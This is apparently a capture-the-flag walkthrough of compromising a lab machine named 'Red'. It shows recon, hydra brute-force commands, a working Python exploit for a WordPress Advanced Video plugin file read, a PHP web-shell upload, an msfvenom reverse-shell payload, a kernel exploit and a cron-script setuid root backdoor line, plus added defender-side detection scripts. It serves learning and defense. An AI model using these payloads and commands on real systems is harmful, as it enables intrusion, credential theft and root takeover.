Recon:

```text
nmap -sC -sV -A 10.0.2.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-04 10:57 UTC
Nmap scan report for 10.0.2.6
Host is up (0.0012s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.0.2.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp   open   domain      dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp   open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp  open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp  open   doom?
| fingerprint-strings:
|   NULL:
|     message2.jpgUT
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongPassword, ODBCClient, ConnectWithDatabase, InteractiveClient, Speaks41ProtocolOld, SupportsCompression, SupportsLoadDataLocal, IgnoreSigpipes, FoundRows, Speaks41ProtocolNew, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: QAz
| \x1Cod\x0Fu\x03\x11X5eM~|d
|_  Auth Plugin Name: mysql_native_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2025-05-04T11:57:40+01:00
|_clock-skew: mean: -20m01s, deviation: 34m38s, median: -2s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-05-04T10:57:40
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: RED, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   1.15 ms 10.0.2.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.37 seconds
```


Enumeration

Nikto revealed 2 files, and from the vsftpd.conf file we learned that anonymous FTP login is allowed.

Usernames so far are:

  1. john
  2. elly
  3. harry
  4. kathy

```sh
hydra -L users.txt -P /usr/share/seclists/Passwords/darkc0de.txt -e nsr ftp://10.0.2.6
```

We got elly with password ylle; logged in to FTP as elly.

Got a few files: ftpuser and passwd. Trying SSH next.

Another user Barry

```sh
grep -E '(/bin/bash|/bin/sh)' passwd | cut -d ':' -f1 > sshusers.txt
hydra -L sshusers.txt -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr 10.0.2.6 ssh
```

User: SHayslett, Pass: SHayslett
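As an added example from the defender's side (not part of the original notes), this Python snippet spots the trace the two hydra runs above leave in auth.log: many failed sshd logins from one source against several different accounts within a short window, optionally followed by an accepted login from the same source. The log lines are constructed samples.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd lines in auth.log, e.g. "Failed password for invalid user elly from 10.0.2.15 port 40112 ssh2"
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<event>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')

def detect_ssh_bruteforce(lines, window_s=60, min_failures=5, min_users=3):
    """Flag source IPs with >= min_failures failed logins across >= min_users
    distinct accounts inside window_s seconds (a wordlist run like the hydra
    command above), and note any account later accepted from that IP."""
    fails, accepted = defaultdict(list), defaultdict(list)
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(re.sub(r'\s+', ' ', m.group('ts')), '%b %d %H:%M:%S')
        bucket = fails if m.group('event') == 'Failed' else accepted
        bucket[m.group('ip')].append((ts, m.group('user')))
    alerts = {}
    for ip, events in fails.items():
        events.sort()
        start = 0
        for end in range(len(events)):            # sliding window over sorted failures
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            burst = events[start:end + 1]
            users = sorted({u for _, u in burst})
            if len(burst) >= min_failures and len(users) >= min_users:
                later = [u for t, u in accepted[ip] if t >= burst[0][0]]
                alerts[ip] = {'failures': len(burst), 'users': users, 'then_accepted': later}
    return alerts

# Constructed auth.log excerpt (not from the original notes).
SAMPLE_AUTH_LOG = """\
May  4 11:10:01 red sshd[2201]: Failed password for john from 10.0.2.15 port 40110 ssh2
May  4 11:10:01 red sshd[2203]: Failed password for invalid user elly from 10.0.2.15 port 40112 ssh2
May  4 11:10:02 red sshd[2205]: Failed password for harry from 10.0.2.15 port 40114 ssh2
May  4 11:10:02 red sshd[2207]: Failed password for kathy from 10.0.2.15 port 40116 ssh2
May  4 11:10:03 red sshd[2209]: Failed password for barry from 10.0.2.15 port 40118 ssh2
May  4 11:10:03 red sshd[2211]: Failed password for peter from 10.0.2.15 port 40120 ssh2
May  4 11:10:04 red sshd[2213]: Accepted password for SHayslett from 10.0.2.15 port 40122 ssh2
May  4 11:25:30 red sshd[2300]: Failed password for peter from 10.0.2.9 port 51000 ssh2
""".splitlines()
```

The one isolated failure from 10.0.2.9 is not reported, while the burst from 10.0.2.15 is, together with the account that was accepted right after it.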

Checked port 666: a jpg. Downloaded it with wget, nothing to see.

Checked port 12380: the page source has a base64 string, but it is too long to be useful. Another name, Zoe; enum4linux also showed this name.

Nikto on 10.0.2.6:12380

SSL can be used.

Disabled JavaScript, but nothing interesting after reload. Second directory.

Using Nuclei, as Parrot OS doesn't support WPScan.

Found plugin **Advanced Video plugin**, version 1.0.

```python
# Python 2 script (urllib2, long(), print statement). It makes the Advanced
# Video plugin publish a post whose "thumb" is a local path (wp-config.php),
# so the file gets copied into the uploads directory, then fetches it.
import random
import urllib2
import re
import ssl

url = "https://10.0.2.6:12380/blogblog"  # updated to https

# SSL handler to skip certificate verification (self-signed cert on 12380)
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

opener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx))
urllib2.install_opener(opener)

# Random title so the new post does not collide with an existing one
randomID = long(random.random() * 100000000000000000L)

# Ask the plugin to publish a post whose thumbnail is a local file path
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()

# Take the last number in the response and divide by 10 to get the post ID
for line in content:
    numbers = re.findall(r'\d+', line)
    id = numbers[-1]
    id = int(id) / 10

# Load the post and pull the thumbnail URL out of its HTML, then print the file
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls = re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()
```
 

What the script did: the files were uploaded under random names, so they must be in wp-content.

cat the downloaded JPEG.
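As an added defender-side example (not part of the original notes), the following Python script flags the request pattern the script above produces in web server access logs: calls to admin-ajax.php with action=ave_publishPost whose thumb parameter is an absolute path, a non-http scheme, or contains ../ traversal instead of a plain http(s) URL. The log lines are constructed samples in the combined log format.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def is_ave_thumb_abuse(request_path):
    """True when an ave_publishPost call passes a thumb that is not a plain
    http(s) URL (absolute path, non-http scheme, or any ../ traversal), which
    is how the plugin is made to copy wp-config.php into the uploads dir."""
    parts = urlsplit(request_path)
    if not parts.path.endswith('/wp-admin/admin-ajax.php'):
        return False
    qs = parse_qs(parts.query)
    if qs.get('action', [''])[0] != 'ave_publishPost':
        return False
    thumb = unquote(qs.get('thumb', [''])[0])   # second decode catches %252e
    if not thumb:
        return False
    return '../' in thumb or not thumb.lower().startswith(('http://', 'https://'))

def find_ave_abuse(log_lines):
    """Return (ip, timestamp, request path) for every abusive request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and is_ave_thumb_abuse(m.group('path')):
            hits.append((m.group('ip'), m.group('time'), m.group('path')))
    return hits

# Constructed sample log lines (not from the original notes): one exploit
# attempt with its follow-up fetches, and one legitimate use of the plugin.
SAMPLE_LOG = [
    '10.0.2.15 - - [04/May/2025:11:02:13 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=31337&short=rnd&term=rnd&thumb=../wp-config.php HTTP/1.1" 200 25 "-" "Python-urllib/2.7"',
    '10.0.2.15 - - [04/May/2025:11:02:14 +0100] "GET /blogblog/?p=18 HTTP/1.1" 200 4823 "-" "Python-urllib/2.7"',
    '10.0.2.15 - - [04/May/2025:11:02:14 +0100] "GET /blogblog/wp-content/uploads/2025/05/18.jpeg HTTP/1.1" 200 3110 "-" "Python-urllib/2.7"',
    '10.0.2.8 - - [04/May/2025:11:05:40 +0100] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=talk&short=x&term=y&thumb=https://img.example.org/t.jpg HTTP/1.1" 200 25 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, when, path in find_ave_abuse(SAMPLE_LOG):
        print('%s %s %s' % (when, ip, path))
```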

```sh
mysql -u root -pplbkac -h 10.0.2.6

hydra -L sq_users -P sql_pass -s 12380 10.0.2.6 https-post-form "/blogblog/wp-login.php:user=^USER^&password=^PASS^:Invalid Login" -V
```

It keeps going.

It seems there are 3 admins; we got one, hydra got all of them.

Classic plugin way to get a shell: uploaded the PHP shell as a plugin and executed it from wp-content.

```text
$ uname -mra && cat /etc/*release*
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
```

SSH did not work for Jkanode, so tried peter with password JZQuyIN5.

```text
red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Sorry, try again.
[sudo] password for peter: 
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
```

This user can execute any command as root, so getting root is trivial.


Two more privilege escalation options:

  1. Kernel exploit, as the kernel is outdated
  2. Cron job exploit

Method 2: Kernel Exploit

Info

Ubuntu 16.04 LTS (Xenial Xerus) with the 4.4.0-21-generic kernel, a relatively old version (released around 2016).

```sh
msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=10.0.2.15 LPORT=4444
```

This did not work; I was not able to get a shell in Metasploit.

What

  • Download the exploit suggester script (Exploit_suggester.sh) from GitHub
  • Upload it to the target

The download URL for the suggested exploit is shown there.

Next

  • Unzip the archive: unzip exploit.tar
  • Compile the exploit first, then run it

We got root.


Method 3: CronJob

```sh
echo "cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash" >> /usr/local/sbin/cron-logrotate.sh
```

Info

What happens here: the appended line copies the /bin/bash binary to /tmp/rootbash and then sets the setuid and setgid bits on /tmp/rootbash.

  • All of this is appended to cron-logrotate.sh; since that script runs with root privileges, any user who then runs /tmp/rootbash will gain root.

World-writable files with logrotate in the name can be located with:

```sh
find / -perm -2 -type f 2>/dev/null | grep logrotate
```

Ignore the above; it is kept here for notes.

After a while, rootbash appears in the /tmp directory.
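As an added defender-side example (not part of the original notes), this Python audit does what the find command above does but from the cron side: it parses an /etc/crontab-style text, takes the first script path of every entry that runs as root, and reports any such script a non-root user could modify (world-writable, writable by a non-root group, or not owned by root), which is exactly the condition that makes the cron-logrotate.sh trick work. The crontab text and the script in `demo()` are constructed.

```python
import os
import re
import stat
import tempfile

# One /etc/crontab entry: five time fields (or an @shortcut), the user, the command.
CRON_RE = re.compile(r'^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$')

def root_cron_scripts(crontab_text):
    """First absolute path in each command the system crontab runs as root."""
    paths = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith('#') or '=' in fields[0]:
            continue                        # blank, comment or VAR=value line
        m = CRON_RE.match(line)
        if m and m.group('user') == 'root':
            paths += [t for t in m.group('cmd').split() if t.startswith('/')][:1]
    return paths

def weak_perms(mode, uid, gid):
    reasons = []                            # ways a non-root user could alter the file
    if uid != 0:
        reasons.append('owned by non-root uid %d' % uid)
    if mode & stat.S_IWOTH:
        reasons.append('world-writable')
    if mode & stat.S_IWGRP and gid != 0:
        reasons.append('writable by non-root group %d' % gid)
    return reasons

def audit_cron_scripts(crontab_text):
    """Map each existing root-run script to its weaknesses, if it has any."""
    findings = {}
    for path in root_cron_scripts(crontab_text):
        if not os.path.exists(path):
            continue                        # nothing to modify (yet)
        st = os.stat(path)
        reasons = weak_perms(st.st_mode, st.st_uid, st.st_gid)
        if reasons:
            findings[path] = reasons
    return findings

def demo():
    # Constructed case: a world-writable logrotate script in a root cron entry.
    script = os.path.join(tempfile.mkdtemp(), 'cron-logrotate.sh')
    with open(script, 'w') as f:
        f.write('#!/bin/sh\n')
    os.chmod(script, 0o777)
    crontab = 'SHELL=/bin/sh\n*/5 * * * * root %s\n0 3 * * * root /bin/true\n' % script
    return audit_cron_scripts(crontab)
```

Run it against the real /etc/crontab (and the files in /etc/cron.d) to catch a script like cron-logrotate.sh before someone appends to it.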